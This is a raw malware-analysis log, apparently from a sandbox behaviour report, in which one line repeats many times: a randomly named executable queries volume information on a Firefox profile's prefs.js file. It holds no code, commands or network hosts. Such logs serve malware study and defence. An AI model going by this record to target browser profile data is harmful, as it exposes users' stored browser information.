                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js VolumeInformation
